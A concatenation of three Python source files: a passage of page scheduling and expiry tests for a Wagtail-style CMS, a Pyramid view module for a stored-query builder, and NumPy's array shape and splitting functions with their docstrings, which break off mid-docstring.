self.assertTrue(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
self.assertTrue(PageRevision.objects.filter(page=p).exclude(approved_go_live_at__isnull=True).exists())
def test_expired_page_will_be_unpublished(self):
# Connect a mock signal handler to page_unpublished signal
signal_fired = [False]
signal_page = [None]
def page_unpublished_handler(sender, instance, **kwargs):
signal_fired[0] = True
signal_page[0] = instance
page_unpublished.connect(page_unpublished_handler)
page = SimplePage(
title="Hello world!",
slug="hello-world",
live=True,
expire_at=timezone.now() - timedelta(days=1),
)
self.root_page.add_child(instance=page)
p = Page.objects.get(slug='hello-world')
self.assertTrue(p.live)
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
self.assertTrue(p.expired)
# Check that the page_published signal was fired
self.assertTrue(signal_fired[0])
self.assertEqual(signal_page[0], page)
self.assertEqual(signal_page[0], signal_page[0].specific)
def test_future_expired_page_will_not_be_unpublished(self):
page = SimplePage(
title="Hello world!",
slug="hello-world",
live=True,
expire_at=timezone.now() + timedelta(days=1),
)
self.root_page.add_child(instance=page)
p = Page.objects.get(slug='hello-world')
self.assertTrue(p.live)
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertTrue(p.live)
self.assertFalse(p.expired)
def test_expired_pages_are_dropped_from_mod_queue(self):
page = SimplePage(
title="Hello world!",
slug="hello-world",
live=False,
expire_at=timezone.now() - timedelta(days=1),
)
self.root_page.add_child(instance=page)
page.save_revision(submitted_for_moderation=True)
p = Page.objects.get(slug='hello-world')
self.assertFalse(p.live)
self.assertTrue(PageRevision.objects.filter(page=p, submitted_for_moderation=True).exists())
management.call_command('publish_scheduled_pages')
p = Page.objects.get(slug='hello-world')
self.assertFalse(PageRevision.objects.filter(page=p, submitted_for_moderation=True).exists())
|
|
from pyramid.httpexceptions import HTTPFound
# from pyramid.response import Response
from collections import defaultdict
from pyramid.renderers import get_renderer
from ..models import (
StoredQuery,
)
import json
from ..lib import (
html_f,
consts,
query_f,
converters,
filter_funcs,
# graphing,
# pretty_sql,
# joins,
display,
)
from .. import config
def list_queries(request):
the_user = config['get_user_func'](request)
layout = get_renderer(config['layout']).implementation()
query_list = config['DBSession'].query(StoredQuery).filter(StoredQuery.creator == the_user.id).order_by(StoredQuery.name.asc())
return dict(
title = "Concision queries",
layout = layout,
the_user = the_user,
query_list = query_list,
)
def new(request):
the_user = config['get_user_func'](request)
layout = get_renderer(config['layout']).implementation()
if "form.submitted" in request.params:
the_query = StoredQuery()
the_query.name = request.params['name'].strip()
the_query.creator = the_user.id
the_query.data = json.dumps(query_f.check_query_data({}))
config['DBSession'].add(the_query)
q = config['DBSession'].query(StoredQuery.id).filter(StoredQuery.creator == the_query.creator).order_by(StoredQuery.id.desc()).first()[0]
return HTTPFound(location=request.route_url("concision.query.overview", query_id=q))
return dict(
title = "Query name",
layout = layout,
the_user = the_user,
)
def overview(request):
the_user = config['get_user_func'](request)
layout = get_renderer(config['layout']).implementation()
query_id = int(request.matchdict['query_id'])
the_query = config['DBSession'].query(StoredQuery).filter(StoredQuery.id == query_id).first()
data = the_query.extract_data()
query_f.check_query_data(data)
tablist = display.tablist(data)
seletable_columns = []
for t in data['tables']:
the_source = config['sources'][t]
seletable_columns.extend([("%s.%s" % (t, c), "%s %s" % (the_source.label, the_source.column_labels.get(c, c))) for c in the_source.columns])
filter_html = display.filter_html(data['filters']).replace("[query_id]", str(query_id))
# Grouping by
selected_columns = defaultdict(list)
for s in data['tables']:
prelude = lambda c: '%s.%s' % (s, c) in data.get('columns', []) or '%s.%s' % (s, c) == data.get('key', "")
the_source = config['sources'][s]
selected_columns[s] = list(filter(prelude, the_source.columns))
return dict(
title = "Concision query",
layout = layout,
the_user = the_user,
the_query = the_query,
data = data,
tables = list(display.tables(data)),
columns = list(display.columns(data)),
filter_html = filter_html,
orderbys = list(display.orderbys(data)),
query_key = display.query_key(data),
query_id = query_id,
tablist = tablist,
seletable_columns = seletable_columns,
html_f = html_f,
consts = consts,
)
def tables(request):
the_user = config['get_user_func'](request)
layout = get_renderer(config['layout']).implementation()
query_id = int(request.matchdict['query_id'])
the_query = config['DBSession'].query(StoredQuery).filter(StoredQuery.id == query_id).first()
data = the_query.extract_data()
query_f.check_query_data(data)
seletable_tables = {}
for k, s in config['sources'].items():
if k in data['tables']: continue
seletable_tables[k] = s.label
return dict(
title = "Concision query",
layout = layout,
the_user = the_user,
the_query = the_query,
data = data,
tables = display.tables(data),
seletable_tables = seletable_tables,
html_f = html_f,
consts = consts,
query_id = query_id,
)
def columns(request):
the_user = config['get_user_func'](request)
layout = get_renderer(config['layout']).implementation()
query_id = int(request.matchdict['query_id'])
the_query = config['DBSession'].query(StoredQuery).filter(StoredQuery.id == query_id).first()
data = the_query.extract_data()
query_f.check_query_data(data)
seletable_columns = []
for t in data['tables']:
the_source = config['sources'][t]
seletable_columns.extend([("%s.%s" % (t, c), "%s %s" % (the_source.label, the_source.column_labels.get(c, c))) for c in the_source.columns])
return dict(
title = "Concision query",
layout = layout,
the_user = the_user,
the_query = the_query,
data = data,
columns = display.columns(data),
seletable_columns = seletable_columns,
html_f = html_f,
consts = consts,
query_id = query_id,
)
def filters(request):
the_user = config['get_user_func'](request)
layout = get_renderer(config['layout']).implementation()
query_id = int(request.matchdict['query_id'])
the_query = config['DBSession'].query(StoredQuery).filter(StoredQuery.id == query_id).first()
data = the_query.extract_data()
query_f.check_query_data(data)
seletable_filters = []
for t in data['tables']:
the_source = config['sources'][t]
seletable_filters.extend([("%s.%s" % (t, c), "%s %s" % (the_source.label, the_source.column_labels.get(c, c))) for c in the_source.columns])
filter_html = display.filter_html(data['filters']).replace("[query_id]", str(query_id))
return dict(
title = "Concision query",
layout = layout,
the_user = the_user,
the_query = the_query,
data = data,
# filters = display.filters(data),
filter_html = filter_html,
seletable_filters = seletable_filters,
html_f = html_f,
consts = consts,
query_id = query_id,
)
def orderby(request):
pass
def groupby(request):
pass
def graphing(request):
the_user = config['get_user_func'](request)
layout = get_renderer(config['layout']).implementation()
query_id = int(request.matchdict['query_id'])
the_query = config['DBSession'].query(StoredQuery).filter(StoredQuery.id == query_id).first()
data = the_query.extract_data()
query_f.check_query_data(data)
keyable_columns = []
for t in data['tables']:
the_source = config['sources'][t]
keyable_columns.extend([("%s.%s" % (t, c), "%s %s" % (the_source.label, the_source.column_labels.get(c, c))) for c in the_source.keys])
selected_key = None
if data['key'] != None:
f, t, c = converters.get_parts(data['key'])
selected_key = "{}.{}".format(t, c)
funcs = f
return dict(
title = "Concision query",
layout = layout,
the_user = the_user,
the_query = the_query,
data = data,
# filters = display.filters(data),
keyable_columns = keyable_columns,
selected_key = selected_key,
html_f = html_f,
consts = consts,
query_id = query_id,
)
|
|
import functools
import numpy.core.numeric as _nx
from numpy.core.numeric import (
asarray, zeros, outer, concatenate, array, asanyarray
)
from numpy.core.fromnumeric import reshape, transpose
from numpy.core.multiarray import normalize_axis_index
from numpy.core import overrides
from numpy.core import vstack, atleast_3d
from numpy.core.numeric import normalize_axis_tuple
from numpy.core.shape_base import _arrays_for_stack_dispatcher
from numpy.lib.index_tricks import ndindex
from numpy.matrixlib.defmatrix import matrix # this raises all the right alarm bells
__all__ = [
'column_stack', 'row_stack', 'dstack', 'array_split', 'split',
'hsplit', 'vsplit', 'dsplit', 'apply_over_axes', 'expand_dims',
'apply_along_axis', 'kron', 'tile', 'get_array_wrap', 'take_along_axis',
'put_along_axis'
]
array_function_dispatch = functools.partial(
overrides.array_function_dispatch, module='numpy')
def _make_along_axis_idx(arr_shape, indices, axis):
# compute dimensions to iterate over
if not _nx.issubdtype(indices.dtype, _nx.integer):
raise IndexError('`indices` must be an integer array')
if len(arr_shape) != indices.ndim:
raise ValueError(
"`indices` and `arr` must have the same number of dimensions")
shape_ones = (1,) * indices.ndim
dest_dims = list(range(axis)) + [None] + list(range(axis+1, indices.ndim))
# build a fancy index, consisting of orthogonal aranges, with the
# requested index inserted at the right location
fancy_index = []
for dim, n in zip(dest_dims, arr_shape):
if dim is None:
fancy_index.append(indices)
else:
ind_shape = shape_ones[:dim] + (-1,) + shape_ones[dim+1:]
fancy_index.append(_nx.arange(n).reshape(ind_shape))
return tuple(fancy_index)
def _take_along_axis_dispatcher(arr, indices, axis):
return (arr, indices)
@array_function_dispatch(_take_along_axis_dispatcher)
def take_along_axis(arr, indices, axis):
"""
Take values from the input array by matching 1d index and data slices.
This iterates over matching 1d slices oriented along the specified axis in
the index and data arrays, and uses the former to look up values in the
latter. These slices can be different lengths.
Functions returning an index along an axis, like `argsort` and
`argpartition`, produce suitable indices for this function.
.. versionadded:: 1.15.0
Parameters
----------
arr : ndarray (Ni..., M, Nk...)
Source array
indices : ndarray (Ni..., J, Nk...)
Indices to take along each 1d slice of `arr`. This must match the
dimension of arr, but dimensions Ni and Nj only need to broadcast
against `arr`.
axis : int
The axis to take 1d slices along. If axis is None, the input array is
treated as if it had first been flattened to 1d, for consistency with
`sort` and `argsort`.
Returns
-------
out: ndarray (Ni..., J, Nk...)
The indexed result.
Notes
-----
This is equivalent to (but faster than) the following use of `ndindex` and
`s_`, which sets each of ``ii`` and ``kk`` to a tuple of indices::
Ni, M, Nk = a.shape[:axis], a.shape[axis], a.shape[axis+1:]
J = indices.shape[axis] # Need not equal M
out = np.empty(Ni + (J,) + Nk)
for ii in ndindex(Ni):
for kk in ndindex(Nk):
a_1d = a [ii + s_[:,] + kk]
indices_1d = indices[ii + s_[:,] + kk]
out_1d = out [ii + s_[:,] + kk]
for j in range(J):
out_1d[j] = a_1d[indices_1d[j]]
Equivalently, eliminating the inner loop, the last two lines would be::
out_1d[:] = a_1d[indices_1d]
See Also
--------
take : Take along an axis, using the same indices for every 1d slice
put_along_axis :
Put values into the destination array by matching 1d index and data slices
Examples
--------
For this sample array
>>> a = np.array([[10, 30, 20], [60, 40, 50]])
We can sort either by using sort directly, or argsort and this function
>>> np.sort(a, axis=1)
array([[10, 20, 30],
[40, 50, 60]])
>>> ai = np.argsort(a, axis=1); ai
array([[0, 2, 1],
[1, 2, 0]])
>>> np.take_along_axis(a, ai, axis=1)
array([[10, 20, 30],
[40, 50, 60]])
The same works for max and min, if you expand the dimensions:
>>> np.expand_dims(np.max(a, axis=1), axis=1)
array([[30],
[60]])
>>> ai = np.expand_dims(np.argmax(a, axis=1), axis=1)
>>> ai
array([[1],
[0]])
>>> np.take_along_axis(a, ai, axis=1)
array([[30],
[60]])
If we want to get the max and min at the same time, we can stack the
indices first
>>> ai_min = np.expand_dims(np.argmin(a, axis=1), axis=1)
>>> ai_max = np.expand_dims(np.argmax(a, axis=1), axis=1)
>>> ai = np.concatenate([ai_min, ai_max], axis=1)
>>> ai
array([[0, 1],
[1, 0]])
>>> np.take_along_axis(a, ai, axis=1)
array([[10, 30],
[40, 60]])
"""
# normalize inputs
if axis is None:
arr = arr.flat
arr_shape = (len(arr),) # flatiter has no .shape
axis = 0
else:
axis = normalize_axis_index(axis, arr.ndim)
arr_shape = arr.shape
# use the fancy index
return arr[_make_along_axis_idx(arr_shape, indices, axis)]
def _put_along_axis_dispatcher(arr, indices, values, axis):
return (arr, indices, values)
@array_function_dispatch(_put_along_axis_dispatcher)
def put_along_axis(arr, indices, values, axis):
"""
Put values into the destination array by matching 1d index and data slices.
This iterates over matching 1d slices oriented along the specified axis in
the index and data arrays, and uses the former to place values into the
latter. These slices can be different lengths.
Functions returning an index along an axis, like `argsort` and
`argpartition`, produce suitable indices for this function.
.. versionadded:: 1.15.0
Parameters
----------
arr : ndarray (Ni..., M, Nk...)
Destination array.
indices : ndarray (Ni..., J, Nk...)
Indices to change along each 1d slice of `arr`. This must match the
dimension of arr, but dimensions in Ni and Nj may be 1 to broadcast
against `arr`.
values : array_like (Ni..., J, Nk...)
values to insert at those indices. Its shape and dimension are
broadcast to match that of `indices`.
axis : int
The axis to take 1d slices along. If axis is None, the destination
array is treated as if a flattened 1d view had been created of it.
Notes
-----
This is equivalent to (but faster than) the following use of `ndindex` and
`s_`, which sets each of ``ii`` and ``kk`` to a tuple of indices::
Ni, M, Nk = a.shape[:axis], a.shape[axis], a.shape[axis+1:]
J = indices.shape[axis] # Need not equal M
for ii in ndindex(Ni):
for kk in ndindex(Nk):
a_1d = a [ii + s_[:,] + kk]
indices_1d = indices[ii + s_[:,] + kk]
values_1d = values [ii + s_[:,] + kk]
for j in range(J):
a_1d[indices_1d[j]] = values_1d[j]
Equivalently, eliminating the inner loop, the last two lines would be::
a_1d[indices_1d] = values_1d
See Also
--------
take_along_axis :
Take values from the input array by matching 1d index and data slices
Examples
--------
For this sample array
>>> a = np.array([[10, 30, 20], [60, 40, 50]])
We can replace the maximum values with:
>>> ai = np.expand_dims(np.argmax(a, axis=1), axis=1)
>>> ai
array([[1],
[0]])
>>> np.put_along_axis(a, ai, 99, axis=1)
>>> a
array([[10, 99, 20],
[99, 40, 50]])
"""
# normalize inputs
if axis is None:
arr = arr.flat
axis = 0
arr_shape = (len(arr),) # flatiter has no .shape
else:
axis = normalize_axis_index(axis, arr.ndim)
arr_shape = arr.shape
# use the fancy index
arr[_make_along_axis_idx(arr_shape, indices, axis)] = values
def _apply_along_axis_dispatcher(func1d, axis, arr, *args, **kwargs):
return (arr,)
@array_function_dispatch(_apply_along_axis_dispatcher)
def apply_along_axis(func1d, axis, arr, *args, **kwargs):
"""
Apply a function to 1-D slices along the given axis.
Execute `func1d(a, *args, **kwargs)` where `func1d` operates on 1-D arrays
and `a` is a 1-D slice of `arr` along `axis`.
This is equivalent to (but faster than) the following use of `ndindex` and
`s_`, which sets each of ``ii``, ``jj``, and ``kk`` to a tuple of indices::
Ni, Nk = a.shape[:axis], a.shape[axis+1:]
for ii in ndindex(Ni):
for kk in ndindex(Nk):
f = func1d(arr[ii + s_[:,] + kk])
Nj = f.shape
for jj in ndindex(Nj):
out[ii + jj + kk] = f[jj]
Equivalently, eliminating the inner loop, this can be expressed as::
Ni, Nk = a.shape[:axis], a.shape[axis+1:]
for ii in ndindex(Ni):
for kk in ndindex(Nk):
out[ii + s_[...,] + kk] = func1d(arr[ii + s_[:,] + kk])
Parameters
----------
func1d : function (M,) -> (Nj...)
This function should accept 1-D arrays. It is applied to 1-D
slices of `arr` along the specified axis.
axis : integer
Axis along which `arr` is sliced.
arr : ndarray (Ni..., M, Nk...)
Input array.
args : any
Additional arguments to `func1d`.
kwargs : any
Additional named arguments to `func1d`.
.. versionadded:: 1.9.0
Returns
-------
out : ndarray (Ni..., Nj..., Nk...)
The output array. The shape of `out` is identical to the shape of
`arr`, except along the `axis` dimension. This axis is removed, and
replaced with new dimensions equal to the shape of the return value
of `func1d`. So if `func1d` returns a scalar `out` will have one
fewer dimensions than `arr`.
See Also
--------
apply_over_axes : Apply a function repeatedly over multiple axes.
Examples
--------
>>> def my_func(a):
... \"\"\"Average first and last element of a 1-D array\"\"\"
... return (a[0] + a[-1]) * 0.5
>>> b = np.array([[1,2,3], [4,5,6], [7,8,9]])
>>> np.apply_along_axis(my_func, 0, b)
array([4., 5., 6.])
>>> np.apply_along_axis(my_func, 1, b)
array([2., 5., 8.])
For a function that returns a 1D array, the number of dimensions in
`outarr` is the same as `arr`.
>>> b = np.array([[8,1,7], [4,3,9], [5,2,6]])
>>> np.apply_along_axis(sorted, 1, b)
array([[1, 7, 8],
[3, 4, 9],
[2, 5, 6]])
For a function that returns a higher dimensional array, those dimensions
are inserted in place of the `axis` dimension.
>>> b = np.array([[1,2,3], [4,5,6], [7,8,9]])
>>> np.apply_along_axis(np.diag, -1, b)
array([[[1, 0, 0],
[0, 2, 0],
[0, 0, 3]],
[[4, 0, 0],
[0, 5, 0],
[0, 0, 6]],
[[7, 0, 0],
[0, 8, 0],
[0, 0, 9]]])
"""
# handle negative axes
arr = asanyarray(arr)
nd = arr.ndim
axis = normalize_axis_index(axis, nd)
# arr, with the iteration axis at the end
in_dims = list(range(nd))
inarr_view = transpose(arr, in_dims[:axis] + in_dims[axis+1:] + [axis])
# compute indices for the iteration axes, and append a trailing ellipsis to
# prevent 0d arrays decaying to scalars, which fixes gh-8642
inds = ndindex(inarr_view.shape[:-1])
inds = (ind + (Ellipsis,) for ind in inds)
# invoke the function on the first item
try:
ind0 = next(inds)
except StopIteration as e:
raise ValueError(
'Cannot apply_along_axis when any iteration dimensions are 0'
) from None
res = asanyarray(func1d(inarr_view[ind0], *args, **kwargs))
# build a buffer for storing evaluations of func1d.
# remove the requested axis, and add the new ones on the end.
# laid out so that each write is contiguous.
# for a tuple index inds, buff[inds] = func1d(inarr_view[inds])
buff = zeros(inarr_view.shape[:-1] + res.shape, res.dtype)
# permutation of axes such that out = buff.transpose(buff_permute)
buff_dims = list(range(buff.ndim))
buff_permute = (
buff_dims[0 : axis] +
buff_dims[buff.ndim-res.ndim : buff.ndim] +
buff_dims[axis : buff.ndim-res.ndim]
)
# matrices have a nasty __array_prepare__ and __array_wrap__
if not isinstance(res, matrix):
buff = res.__array_prepare__(buff)
# save the first result, then compute and save all remaining results
buff[ind0] = res
for ind in inds:
buff[ind] = asanyarray(func1d(inarr_view[ind], *args, **kwargs))
if not isinstance(res, matrix):
# wrap the array, to preserve subclasses
buff = res.__array_wrap__(buff)
# finally, rotate the inserted axes back to where they belong
return transpose(buff, buff_permute)
else:
# matrices have to be transposed first, because they collapse dimensions!
out_arr = transpose(buff, buff_permute)
return res.__array_wrap__(out_arr)
def _apply_over_axes_dispatcher(func, a, axes):
return (a,)
@array_function_dispatch(_apply_over_axes_dispatcher)
def apply_over_axes(func, a, axes):
"""
Apply a function repeatedly over multiple axes.
`func` is called as `res = func(a, axis)`, where `axis` is the first
element of `axes`. The result `res` of the function call must have
either the same dimensions as `a` or one less dimension. If `res`
has one less dimension than `a`, a dimension is inserted before
`axis`. The call to `func` is then repeated for each axis in `axes`,
with `res` as the first argument.
Parameters
----------
func : function
This function must take two arguments, `func(a, axis)`.
a : array_like
Input array.
axes : array_like
Axes over which `func` is applied; the elements must be integers.
Returns
-------
apply_over_axis : ndarray
The output array. The number of dimensions is the same as `a`,
but the shape can be different. This depends on whether `func`
changes the shape of its output with respect to its input.
See Also
--------
apply_along_axis :
Apply a function to 1-D slices of an array along the given axis.
Notes
-----
This function is equivalent to tuple axis arguments to reorderable ufuncs
with keepdims=True. Tuple axis arguments to ufuncs have been available since
version 1.7.0.
Examples
--------
>>> a = np.arange(24).reshape(2,3,4)
>>> a
array([[[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11]],
[[12, 13, 14, 15],
[16, 17, 18, 19],
[20, 21, 22, 23]]])
Sum over axes 0 and 2. The result has same number of dimensions
as the original array:
>>> np.apply_over_axes(np.sum, a, [0,2])
array([[[ 60],
[ 92],
[124]]])
Tuple axis arguments to ufuncs are equivalent:
>>> np.sum(a, axis=(0,2), keepdims=True)
array([[[ 60],
[ 92],
[124]]])
"""
val = asarray(a)
N = a.ndim
if array(axes).ndim == 0:
axes = (axes,)
for axis in axes:
if axis < 0:
axis = N + axis
args = (val, axis)
res = func(*args)
if res.ndim == val.ndim:
val = res
else:
res = expand_dims(res, axis)
if res.ndim == val.ndim:
val = res
else:
raise ValueError("function is not returning "
"an array of the correct shape")
return val
def _expand_dims_dispatcher(a, axis):
return (a,)
@array_function_dispatch(_expand_dims_dispatcher)
def expand_dims(a, axis):
"""
Expand the shape of an array.
Insert a new axis that will appear at the `axis` position in the expanded
array shape.
Parameters
----------
a : array_like
Input array.
axis : int or tuple of ints
Position in the expanded axes where the new axis (or axes) is placed.
.. deprecated:: 1.13.0
Passing an axis where ``axis > a.ndim`` will be treated as
``axis == a.ndim``, and passing ``axis < -a.ndim - 1`` will
be treated as ``axis == 0``. This behavior is deprecated.
.. versionchanged:: 1.18.0
A tuple of axes is now supported. Out of range axes as
described above are now forbidden and raise an `AxisError`.
Returns
-------
result : ndarray
View of `a` with the number of dimensions increased.
See Also
--------
squeeze : The inverse operation, removing singleton dimensions
reshape : Insert, remove, and combine dimensions, and resize existing ones
doc.indexing, atleast_1d, atleast_2d, atleast_3d
Examples
--------
>>> x = np.array([1, 2])
>>> x.shape
(2,)
The following is equivalent to ``x[np.newaxis, :]`` or ``x[np.newaxis]``:
>>> y = np.expand_dims(x, axis=0)
>>> y
array([[1, 2]])
>>> y.shape
(1, 2)
The following is equivalent to ``x[:, np.newaxis]``:
>>> y = np.expand_dims(x, axis=1)
>>> y
array([[1],
[2]])
>>> y.shape
(2, 1)
``axis`` may also be a tuple:
>>> y = np.expand_dims(x, axis=(0, 1))
>>> y
array([[[1, 2]]])
>>> y = np.expand_dims(x, axis=(2, 0))
>>> y
array([[[1],
[2]]])
Note that some examples may use ``None`` instead of ``np.newaxis``. These
are the same objects:
>>> np.newaxis is None
True
"""
if isinstance(a, matrix):
a = asarray(a)
else:
a = asanyarray(a)
if type(axis) not in (tuple, list):
axis = (axis,)
out_ndim = len(axis) + a.ndim
axis = normalize_axis_tuple(axis, out_ndim)
shape_it = iter(a.shape)
shape = [1 if ax in axis else next(shape_it) for ax in range(out_ndim)]
return a.reshape(shape)
row_stack = vstack
def _column_stack_dispatcher(tup):
return _arrays_for_stack_dispatcher(tup)
@array_function_dispatch(_column_stack_dispatcher)
def column_stack(tup):
"""
Stack 1-D arrays as columns into a 2-D array.
Take a sequence of 1-D arrays and stack them as columns
to make a single 2-D array. 2-D arrays are stacked as-is,
just like with `hstack`. 1-D arrays are turned into 2-D columns
first.
Parameters
----------
tup : sequence of 1-D or 2-D arrays.
Arrays to stack. All of them must have the same first dimension.
Returns
-------
stacked : 2-D array
The array formed by stacking the given arrays.
See Also
--------
stack, hstack, vstack, concatenate
Examples
--------
>>> a = np.array((1,2,3))
>>> b = np.array((2,3,4))
>>> np.column_stack((a,b))
array([[1, 2],
[2, 3],
[3, 4]])
"""
if not overrides.ARRAY_FUNCTION_ENABLED:
# raise warning if necessary
_arrays_for_stack_dispatcher(tup, stacklevel=2)
arrays = []
for v in tup:
arr = asanyarray(v)
if arr.ndim < 2:
arr = array(arr, copy=False, subok=True, ndmin=2).T
arrays.append(arr)
return _nx.concatenate(arrays, 1)
def _dstack_dispatcher(tup):
return _arrays_for_stack_dispatcher(tup)
@array_function_dispatch(_dstack_dispatcher)
def dstack(tup):
"""
Stack arrays in sequence depth wise (along third axis).
This is equivalent to concatenation along the third axis after 2-D arrays
of shape `(M,N)` have been reshaped to `(M,N,1)` and 1-D arrays of shape
`(N,)` have been reshaped to `(1,N,1)`. Rebuilds arrays divided by
`dsplit`.
This function makes most sense for arrays with up to 3 dimensions. For
instance, for pixel-data with a height (first axis), width (second axis),
and r/g/b channels (third axis). The functions `concatenate`, `stack` and
`block` provide more general stacking and concatenation operations.
Parameters
----------
tup : sequence of arrays
The arrays must have the same shape along all but the third axis.
1-D or 2-D arrays must have the same shape.
Returns
-------
stacked : ndarray
The array formed by stacking the given arrays, will be at least 3-D.
See Also
--------
concatenate : Join a sequence of arrays along an existing axis.
stack : Join a sequence of arrays along a new axis.
block : Assemble an nd-array from nested lists of blocks.
vstack : Stack arrays in sequence vertically (row wise).
hstack : Stack arrays in sequence horizontally (column wise).
column_stack : Stack 1-D arrays as columns into a 2-D array.
dsplit : Split array along third axis.
Examples
--------
>>> a = np.array((1,2,3))
>>> b = np.array((2,3,4))
>>> np.dstack((a,b))
array([[[1, 2],
[2, 3],
[3, 4]]])
>>> a = np.array([[1],[2],[3]])
>>> b = np.array([[2],[3],[4]])
>>> np.dstack((a,b))
array([[[1, 2]],
[[2, 3]],
[[3, 4]]])
"""
if not overrides.ARRAY_FUNCTION_ENABLED:
# raise warning if necessary
_arrays_for_stack_dispatcher(tup, stacklevel=2)
arrs = atleast_3d(*tup)
if not isinstance(arrs, list):
arrs = [arrs]
return _nx.concatenate(arrs, 2)
def _replace_zero_by_x_arrays(sub_arys):
for i in range(len(sub_arys)):
if _nx.ndim(sub_arys[i]) == 0:
sub_arys[i] = _nx.empty(0, dtype=sub_arys[i].dtype)
elif _nx.sometrue(_nx.equal(_nx.shape(sub_arys[i]), 0)):
sub_arys[i] = _nx.empty(0, dtype=sub_arys[i].dtype)
return sub_arys
def _array_split_dispatcher(ary, indices_or_sections, axis=None):
return (ary, indices_or_sections)
@array_function_dispatch(_array_split_dispatcher)
def array_split(ary, indices_or_sections, axis=0):
"""
Split an array into multiple sub-arrays.
Please refer to the ``split`` documentation. The only difference
between these functions is that ``array_split`` allows
`indices_or_sections` to be an integer that does *not* equally
divide the axis. For an array of length l that should be split
into n sections, it returns l % n sub-arrays of size l//n + 1
and the rest of size l//n.
See Also
--------
split : Split array into multiple sub-arrays of equal size.
Examples
--------
>>> x = np.arange(8.0)
>>> np.array_split(x, 3)
[array([0., 1., 2.]), array([3., 4., 5.]), array([6., 7.])]
>>> x = np.arange(9)
>>> np.array_split(x, 4)
[array([0, 1, 2]), array([3, 4]), array([5, 6]), array([7, 8])]
"""
try:
Ntotal = ary.shape[axis]
except AttributeError:
Ntotal = len(ary)
try:
# handle array case.
Nsections = len(indices_or_sections) + 1
div_points = [0] + list(indices_or_sections) + [Ntotal]
except TypeError:
# indices_or_sections is a scalar, not an array.
Nsections = int(indices_or_sections)
if Nsections <= 0:
raise ValueError('number sections must be larger than 0.') from None
Neach_section, extras = divmod(Ntotal, Nsections)
section_sizes = ([0] +
extras * [Neach_section+1] +
(Nsections-extras) * [Neach_section])
div_points = _nx.array(section_sizes, dtype=_nx.intp).cumsum()
sub_arys = []
sary = _nx.swapaxes(ary, axis, 0)
for i in range(Nsections):
st = div_points[i]
end = div_points[i + 1]
sub_arys.append(_nx.swapaxes(sary[st:end], axis, 0))
return sub_arys
def _split_dispatcher(ary, indices_or_sections, axis=None):
return (ary, indices_or_sections)
@array_function_dispatch(_split_dispatcher)
def split(ary, indices_or_sections, axis=0):
"""
Split an array into multiple sub-arrays as views into `ary`.
Parameters
----------
ary : ndarray
Array to be divided into sub-arrays.
indices_or_sections : int or 1-D array
If `indices_or_sections` is an integer, N, the array will be divided
into N equal arrays along `axis`. If such a split is not possible,
an error is raised.
If `indices_or_sections` is a 1-D array of sorted integers, the entries
indicate where along `axis` the array is split. For example,
``[2, 3]`` would, for ``axis=0``, result in
- ary[:2]
- ary[2:3]
- ary[3:]
If an index exceeds the dimension of the array along `axis`,
an empty sub-array is returned correspondingly.
axis : int, optional
The axis along which to split, default is 0.
Returns
-------
sub-arrays : list of ndarrays
A list of sub-arrays as views into `ary`.
Raises
------
ValueError
If `indices_or_sections` is given as an integer, but
a split does not result in equal division.
See Also
--------
array_split : Split an array into multiple sub-arrays of equal or
near-equal size. Does not raise an exception if
an equal division cannot be made.
hsplit : Split array into multiple sub-arrays horizontally (column-wise).
vsplit : Split array into multiple sub-arrays vertically (row wise).
dsplit : Split array into multiple sub-arrays along the 3rd axis (depth).
concatenate : Join a sequence of arrays along an existing axis.
stack : Join a sequence of arrays along a new axis.
hstack : Stack arrays in sequence horizontally (column wise).
vstack : Stack arrays in sequence vertically (row wise).
dstack : Stack arrays in sequence depth wise (along third dimension).
Examples
--------
>>> x = np.arange(9.0)
>>> np.split(x, 3)
[array([0., 1., 2.]), array([3., 4., 5.]), array([6., 7., 8.])]
>>> x = np.arange(8.0)
>>> np.split(x, [3, 5, 6, 10])
[array([0., 1., 2.]),
array([3., 4.]),
array([5.]),
array([6., 7.]),
array([], dtype=float64)]
"""
try:
len(indices_or_sections)
except TypeError:
sections = indices_or_sections
N = ary.shape[axis]
if N % sections:
raise ValueError(
'array split does not result in an equal division') from None
return array_split(ary, indices_or_sections, axis)
def _hvdsplit_dispatcher(ary, indices_or_sections):
return (ary, indices_or_sections)
@array_function_dispatch(_hvdsplit_dispatcher)
def hsplit(ary, indices_or_sections):
"""
Split an array into multiple sub-arrays horizontally (column-wise).
Please refer to the `split` documentation. `hsplit` is equivalent
to `split` with ``axis=1``, the array is always split along the second
axis regardless of the array dimension.
See Also
--------
split : Split an array into multiple sub-arrays of equal size.
Examples
--------
>>> x = np.arange(16.0).reshape(4, 4)
>>> x
array([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[12., 13., 14., 15.]])
>>> np.hsplit(x, 2)
[array([[ 0., 1.],
[ 4., 5.],
[ 8., 9.],
[12., 13.]]),
array([[ 2., 3.],
[ 6., 7.],
[10., 11.],
[14., 15.]])]
>>> np.hsplit(x, np.array([3, 6]))
[array([[ 0., 1., 2.],
[ 4., 5., 6.],
[ 8., 9., 10.],
[12., 13., 14.]]),
array([[ 3.],
[ 7.],
[11.],
[15.]]),
array([], shape=(4, 0), dtype=float64)]
With a higher dimensional array the split is still along the second axis.
>>> x = np.arange(8.0).reshape(2, 2, 2)
>>> x
array([[[0., 1.],
[2., 3.]],
[[4., 5.],
[6., 7.]]])
>>> np.hsplit(x, 2)
[array([[[0., 1.]],
[[4., 5.]]]),
array([[[2., 3.]],
[[6., 7.]]])]
"""
if _nx.ndim(ary) == 0:
raise ValueError('hsplit only works on arrays of 1 or more dimensions')
if ary.ndim > 1:
return split(ary, indices_or_sections, 1)
else:
return split(ary, indices_or_sections, 0)
@array_function_dispatch(_hvdsplit_dispatcher)
def vsplit(ary, indices_or_sections):
"""
Split an array into multiple sub-arrays vertically (row-wise).
Please refer to the ``split`` documentation. ``vsplit`` is equivalent
to ``split`` with `axis=0` (default), the array is always split along the
first axis regardless of the array dimension.
See Also
--------
split : Split an array into multiple sub-arrays of equal size.
Examples
--------
>>> x = np.arange(16.0).reshape(4, 4)
>>> x
array([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
